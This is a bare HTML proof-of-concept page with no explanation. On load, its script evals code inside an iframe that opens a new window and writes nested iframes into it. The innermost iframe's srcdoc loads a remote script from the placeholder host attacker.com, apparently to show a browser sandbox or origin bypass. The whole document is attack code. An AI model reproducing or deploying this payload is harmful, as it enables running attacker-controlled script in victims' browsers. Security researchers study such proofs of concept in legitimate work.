<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<iframe id="GGGGGXGHRxGGGGG" src="about:blank"></iframe>
<script>
window.onload = function() {
    GGGGGXGHRxGGGGG.onload=_=>GGGGGXGHRxGGGGG.contentWindow.eval("w=window.open('about:blank'); w.document.write('<iframe id=GGGXGHRxGGG src=about:blank><\/iframe><script>GGGXGHRxGGG.addEventListener(\x22load\x22,()=>{GGGXGHRxGGG.srcdoc=\x22<script src=https://attacker.com/static/static.js><\\/script>\x22;},{once:true});<\/script>');");GGGGGXGHRxGGGGG.contentWindow.location.reload();
};
</script>
</body>
</html>